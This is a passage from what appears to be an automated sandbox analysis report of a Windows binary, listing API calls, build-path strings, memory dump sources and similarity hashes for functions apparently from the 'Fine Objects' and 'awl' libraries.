                                                                                                • SendMessageW.USER32(00000000,?,?,?), ref: 004311C9
                                                                                                • GetTopWindow.USER32(00000000), ref: 004311D0
                                                                                                • GetWindow.USER32(00000000,00000002), ref: 004311F0
                                                                                                  • Part of subcall function 00431AB0: EnterCriticalSection.KERNEL32 ref: 00431B12
                                                                                                  • Part of subcall function 00431AB0: LeaveCriticalSection.KERNEL32(00535A5C,00000000), ref: 00431B4E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$CriticalSection$EnterLeaveMessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3767135013-0
                                                                                                • Opcode ID: 606bdce903324a9c126a6cb32ee1ea0f50f1782c65d3d7a7cc99ea76831578ca
                                                                                                • Instruction ID: c5356f44cabc4e0224be0d6699242279aec22895d87a14f716e029c4085d4685
                                                                                                • Opcode Fuzzy Hash: 606bdce903324a9c126a6cb32ee1ea0f50f1782c65d3d7a7cc99ea76831578ca
                                                                                                • Instruction Fuzzy Hash: A701D271A012157BDF221B259C08DAF7E99AFCD3A5F045226FD0882361DB38CD2086E9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0048F3EB
                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 0048F44F
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp, xrefs: 0048F425
                                                                                                • @fO, xrefs: 0048F42F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp
                                                                                                • API String ID: 944179621-200847071
                                                                                                • Opcode ID: 8c801d19af88b6e22633f82d658473023eed50b5db448f56a0015e87e04be089
                                                                                                • Instruction ID: 149801a13b8b60fd33d32afdc32bace7098f25a5d72700ba40595418d050ee7b
                                                                                                • Opcode Fuzzy Hash: 8c801d19af88b6e22633f82d658473023eed50b5db448f56a0015e87e04be089
                                                                                                • Instruction Fuzzy Hash: 04112572A00248ABD700DB58CD45FAFBBB8FB54724F10461BF815A77C2C7B99904C7A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(005359BC), ref: 0043524A
                                                                                                • LeaveCriticalSection.KERNEL32(005359BC,00000000,00000000,00000000), ref: 004352A0
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0043527A
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\handlemapawl.h, xrefs: 00435270
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\handlemapawl.h
                                                                                                • API String ID: 944179621-2023502347
                                                                                                • Opcode ID: be21aadda0b88ac5352b8d5014f6f9d2d0b3a596aaa31f7985181963d31d3bb2
                                                                                                • Instruction ID: 398072803377a849239173a2562ea71c7fea56ee8e0ebc9c739f0a3c11b79cb2
                                                                                                • Opcode Fuzzy Hash: be21aadda0b88ac5352b8d5014f6f9d2d0b3a596aaa31f7985181963d31d3bb2
                                                                                                • Instruction Fuzzy Hash: 7811E531400648ABD720DF58CC02BAEBBB8EB55724F10471FF865A26D0D7B86604C695
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DeleteCriticalSection.KERNEL32 ref: 0049F49A
                                                                                                • DeleteCriticalSection.KERNEL32(00000088), ref: 0049F4C3
                                                                                                • DeleteCriticalSection.KERNEL32(00000044), ref: 0049F4E6
                                                                                                • DeleteCriticalSection.KERNEL32(00000000), ref: 0049F4F8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalDeleteSection
                                                                                                • String ID:
                                                                                                • API String ID: 166494926-0
                                                                                                • Opcode ID: 1bac61f04da8a1e1a64fffbc54bec0461effd141c317958c8a0cb7d735bbc968
                                                                                                • Instruction ID: 9e5caf17c7afeddcbf6f2a359c19032226a4f5dbfe785a3b969767877566038e
                                                                                                • Opcode Fuzzy Hash: 1bac61f04da8a1e1a64fffbc54bec0461effd141c317958c8a0cb7d735bbc968
                                                                                                • Instruction Fuzzy Hash: 011127B1901A09EBC704DF99D944B89FBB8FB45724F10836A9425936D0DBB46A14CBD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00000170), ref: 0049C17D
                                                                                                • LeaveCriticalSection.KERNEL32(00000170,?), ref: 0049C1CA
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\finenetserverimpl.cpp, xrefs: 0049C19B
                                                                                                • @fO, xrefs: 0049C1A5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\finenetserverimpl.cpp
                                                                                                • API String ID: 944179621-2283996367
                                                                                                • Opcode ID: 0a895c141cb3e2e3af4fd99300fabd79e4984cdf0e5ec28bbd9788918185848f
                                                                                                • Instruction ID: c08c4e36c744676dc28f989fa4651f72149b185b1e19da285386474638d47c89
                                                                                                • Opcode Fuzzy Hash: 0a895c141cb3e2e3af4fd99300fabd79e4984cdf0e5ec28bbd9788918185848f
                                                                                                • Instruction Fuzzy Hash: F201B131944384EBD720DB68DC06BEEFBB8EB56714F10472FE865622D1C7F92610CA99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32(74E070F0,?,?,?,004E480E,000000FF,?,0041CB20,?,?,?,?), ref: 0047F3A1
                                                                                                • TlsSetValue.KERNEL32(0053011C,?,0041CB20,?,?,?,?), ref: 0047F3BF
                                                                                                • MessageBoxW.USER32(?,?,0041CB20,00000000), ref: 0047F3E1
                                                                                                • TlsSetValue.KERNEL32(0053011C,?,0041CB20,?,?), ref: 0047F3F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$Message
                                                                                                • String ID:
                                                                                                • API String ID: 3504782000-0
                                                                                                • Opcode ID: 44d607a4e17a578b5e30cbc53c6957f1e86ad36ea11d4b9ed142f3831a209595
                                                                                                • Instruction ID: 3199f7d4f0c816be3acf61f6adbd5d4561fe403cb07d9e4b738f538c7aadfd8f
                                                                                                • Opcode Fuzzy Hash: 44d607a4e17a578b5e30cbc53c6957f1e86ad36ea11d4b9ed142f3831a209595
                                                                                                • Instruction Fuzzy Hash: 1D01DF75600208FFCB009F45ED09B6A7FB9FB89B20F10812AF80493361CB759C20DB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00000008,?,?,?,?,?,?,004DC438,000000FF), ref: 004A30F6
                                                                                                • LeaveCriticalSection.KERNEL32(00000008,?,?,?,?,?,?,004DC438,000000FF), ref: 004A313B
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 004A311B
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\log.cpp, xrefs: 004A3111
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\log.cpp
                                                                                                • API String ID: 944179621-1594455982
                                                                                                • Opcode ID: 19799e1c7da0d24658fa5721f0364f017721a7f54ead38ede5fd6e67c946cba7
                                                                                                • Instruction ID: f1ad958ce3d5f5db633624be38a8d4aa92feb1e3060e042042a42c06aea07ab2
                                                                                                • Opcode Fuzzy Hash: 19799e1c7da0d24658fa5721f0364f017721a7f54ead38ede5fd6e67c946cba7
                                                                                                • Instruction Fuzzy Hash: 34012F30800258EBC720CF58CC05BAEBBB4EB19725F10075EF826A37C1C7B85604CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,00491C3E,?,?,000000FF,74E070F0), ref: 0041244A
                                                                                                • TlsGetValue.KERNEL32(74E070F0,000000FF,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1B2
                                                                                                • TlsSetValue.KERNEL32(0053011C,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1D0
                                                                                                  • Part of subcall function 0046CA80: __CxxThrowException@8.LIBVCRUNTIME ref: 0046CAFF
                                                                                                  • Part of subcall function 0046CA80: InterlockedDecrement.KERNEL32(?), ref: 0046CB21
                                                                                                  • Part of subcall function 0046CA80: TlsSetValue.KERNEL32(?,?,00412460), ref: 0046CB5E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Value$DecrementErrorException@8InterlockedLastThrow
                                                                                                • String ID: AssertStopMode$pNS$KS
                                                                                                • API String ID: 1921931785-376765394
                                                                                                • Opcode ID: 02fd4db36401fc310c3c61b9ce20fd376a1dc24773a56b89ab033322ecc527fa
                                                                                                • Instruction ID: e7385fb664a5c3fa1fe68bbfabdf46f8e68f7fdd5de9d6919a30b8646d1e822b
                                                                                                • Opcode Fuzzy Hash: 02fd4db36401fc310c3c61b9ce20fd376a1dc24773a56b89ab033322ecc527fa
                                                                                                • Instruction Fuzzy Hash: A3C0802091150C030A1011B41C49077339545422177500759DC95C36D1FD095D2045DF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A5218
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 004A518E
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\map.h, xrefs: 004A5184
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$DecrementEnterException@8InterlockedLeaveThrow
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\map.h
                                                                                                • API String ID: 132347594-1291485746
                                                                                                • Opcode ID: 1f94910e449d414a29e42e4ff169713de133673976593bba19e49f0e3bfb9c61
                                                                                                • Instruction ID: 4c023e270abd67b743d7946872e628261a070e38904bd3563b88e40e28c6fa99
                                                                                                • Opcode Fuzzy Hash: 1f94910e449d414a29e42e4ff169713de133673976593bba19e49f0e3bfb9c61
                                                                                                • Instruction Fuzzy Hash: 1741B432600A15AFD710CF58C980B96BBA0FF26720F99829AD865DB3D1C779EC41CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32 ref: 0046141F
                                                                                                  • Part of subcall function 004603F0: SendMessageW.USER32 ref: 00460425
                                                                                                Strings
                                                                                                • @fO, xrefs: 00461400
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\toolbarawl.cpp, xrefs: 004613F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlockedMessageSend
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\toolbarawl.cpp
                                                                                                • API String ID: 2168808221-3625062339
                                                                                                • Opcode ID: 4b8429f85afa31f73bf490d6dfc254a0b51c3401a8f1228243d622ee647d0c46
                                                                                                • Instruction ID: 02cb6323c4d264b3ddd2de466c11b98d3bf215de2d900d503134c03412c06e46
                                                                                                • Opcode Fuzzy Hash: 4b8429f85afa31f73bf490d6dfc254a0b51c3401a8f1228243d622ee647d0c46
                                                                                                • Instruction Fuzzy Hash: 8F41BD70600204EFDB25CF19C885B9BBBA4EF48714F04855EEC599F392DBB9EA40CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041AD30: InterlockedDecrement.KERNEL32(0000000100000003), ref: 0041AD80
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00428582
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$DecrementEnterException@8FreeInterlockedLeaveTaskThrow
                                                                                                • String ID: @fO$Wia\WiaItem.cpp
                                                                                                • API String ID: 3496801171-2923260145
                                                                                                • Opcode ID: 6a74015a8bf169f8baf56ffd48a4bcb0ebbaa075188269e638c06a60b4466d6a
                                                                                                • Instruction ID: 93e87dba171ab63976d3522b0f14ab7214d0a75b7306ee7901f9af27975b16ad
                                                                                                • Opcode Fuzzy Hash: 6a74015a8bf169f8baf56ffd48a4bcb0ebbaa075188269e638c06a60b4466d6a
                                                                                                • Instruction Fuzzy Hash: BD31E271A00259EFCB00DF98D845BAFBBB4EF48314F50851EF915AB281CB78AA01CBD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • MessageBoxW.USER32(00000000,?,Fine Objects,00000011), ref: 0048325B
                                                                                                  • Part of subcall function 00482C00: TlsGetValue.KERNEL32(00000200,00000000,00000200,00000002,00000200,004E0AAC,000000FF,?,00482B30,00000200,00000002,00000002,?), ref: 00482C3F
                                                                                                • OutputDebugStringW.KERNEL32(?), ref: 00483270
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DebugMessageOutputStringValue
                                                                                                • String ID: Fine Objects
                                                                                                • API String ID: 916689749-1333118125
                                                                                                • Opcode ID: 5e063d0fb2cd85552d91b5a5a3bd1d1bc46733c3d091fbaae3dd117f298de5ef
                                                                                                • Instruction ID: 4154f264dcd7ad5e9bab3ededdecf385263db72b4cf2e4ccf1df46c8944e7162
                                                                                                • Opcode Fuzzy Hash: 5e063d0fb2cd85552d91b5a5a3bd1d1bc46733c3d091fbaae3dd117f298de5ef
                                                                                                • Instruction Fuzzy Hash: B831B4B1A002099BDB14DF68CD49BAEBBB9EF44B10F104A6EE915E32D1D7749E40CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\framewindowawl.cpp, xrefs: 0042C04B
                                                                                                • @fO, xrefs: 0042C055
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\framewindowawl.cpp
                                                                                                • API String ID: 2353593579-1930538455
                                                                                                • Opcode ID: 4f54486222cdd5687e555f83e69179aaad01da55b80518cd45234434f838e8a1
                                                                                                • Instruction ID: 7e474e7d821e977f4f303d5e12e1268ffdadf2ace80645a63310bd8be6a87bf9
                                                                                                • Opcode Fuzzy Hash: 4f54486222cdd5687e555f83e69179aaad01da55b80518cd45234434f838e8a1
                                                                                                • Instruction Fuzzy Hash: 2F31A130A00764DBDB20DF98D942BAFB7E4AB04B14F40025EE845AB7C1C7B99904CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(8BEC458B), ref: 004824F2
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\hashtable.cpp, xrefs: 004824A5
                                                                                                • @fO, xrefs: 004824AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: IncrementInterlocked
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\hashtable.cpp
                                                                                                • API String ID: 3508698243-94179993
                                                                                                • Opcode ID: 552afca51e9b5d1121023787078f2eaa2a8034fde8240009747472e9bec17d59
                                                                                                • Instruction ID: 9266f518c833ed6254046c414bdd5f6c2f0a7afc7cbaaf62a38719daed636965
                                                                                                • Opcode Fuzzy Hash: 552afca51e9b5d1121023787078f2eaa2a8034fde8240009747472e9bec17d59
                                                                                                • Instruction Fuzzy Hash: 9B21B431500320ABC710BF1CDD01B6EB7E5E79AB24F119A5AF822D73E1D7B85801D798
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • VerQueryValueW.VERSION(?,?,00000000,00000000,0050AB64,00000001), ref: 0048310B
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00483143
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlockedQueryValue
                                                                                                • String ID: xMS
                                                                                                • API String ID: 2301526173-303485436
                                                                                                • Opcode ID: 0f224d2fb185f3a776e94f6a4b5f0231ad8695888c9fe9646698304df7e423cd
                                                                                                • Instruction ID: 75516f276cdf019f420448540485f263b078db7f15b4837d68307082bc699645
                                                                                                • Opcode Fuzzy Hash: 0f224d2fb185f3a776e94f6a4b5f0231ad8695888c9fe9646698304df7e423cd
                                                                                                • Instruction Fuzzy Hash: F821B271A01605AFDB10DF55DC05BBFB7A8EB51B21F008A2EE41193380D779AA15CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(74E070F0), ref: 0048230E
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 00482339
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
